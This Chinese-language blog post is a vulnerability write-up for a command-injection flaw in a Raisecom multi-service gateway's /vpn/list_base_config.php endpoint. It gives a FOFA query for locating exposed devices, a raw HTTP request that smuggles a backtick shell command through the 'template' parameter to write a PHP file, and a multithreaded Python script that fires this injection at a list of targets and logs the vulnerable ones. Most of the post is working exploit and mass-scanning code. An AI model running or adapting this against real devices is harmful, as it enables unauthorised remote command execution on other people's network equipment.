一、漏洞简介
融合型多业务智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络产品。该产品集数据、语音、安全、无线等功能于一体,能够为用户提供一个综合、完整的网络接入解决方案。漏洞位置位于/vpn/list_base_config.php接口未对用户提交的参数进行限制和校验,导致攻击者可以通过该接口参数写入php文件并访问,导致远程命令执行漏洞。
(声明:任何利用该漏洞进行非法攻击的,和本博客无关,使用者自己承担相应责任!!!!)
二、资产测绘
Fofa:
body="/images/raisecom/back.gif" && title=="Web user login"
三、POC信息
1、写入php文件:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
访问/tmp/test.php即可验证漏洞
四、漏洞批量验证脚本
import requests
import urllib3
from requests import RequestException
from bs4 import BeautifulSoup
import threading
urllib3.disable_warnings()
result_list = []
def poc(url):
Path = url.strip()+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>/www/tmp/test.php`"
Header = {
"referer": "https://segmentfault.com/",
"Sec-ch-ua": '"Not)A;Brand";v="99", " MicrosoftEdge";v="127", " Chromium";v="127"',
"sec-ch-ua-mobile": "?0",
"sec-ch-ua-platform": '"Windows"',
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0"
}
try:
response = requests.get(url=Path,headers=Header,verify=False,timeout=3)
if response.status_code == 200:
try:
file_check = requests.get(url=(url.strip()+"/tmp/test.php"),headers=Header,verify=False,timeout=3)
soup = BeautifulSoup(file_check.content,'html.parser')
php_Extension = soup.find(string="PHP Extension")
registered_Streams = soup.find(string="Registered PHP Streams")
registered_Trans = soup.find(string = "Registered Stream Socket Transports")
if file_check.status_code == 200 and(php_Extension or registered_Trans or registered_Streams):
print(f"{url}存在文件写入导致RCE")
result_list.append(url.strip()+"\n")
except RequestException as k:
pass
except RequestException as e:
pass
def Mult_threading():
threads = []
with open("url.txt",'r') as urls:
for url in urls:
Thread = threading.Thread(target=poc,args=(url,))
threads.append(Thread)
Thread.start()
for i in threads:
i.join()
if __name__ == '__main__':
Mult_threading()
with open("result.txt",'w') as file:
for i in result_list:
file.write(i.strip()+"\n")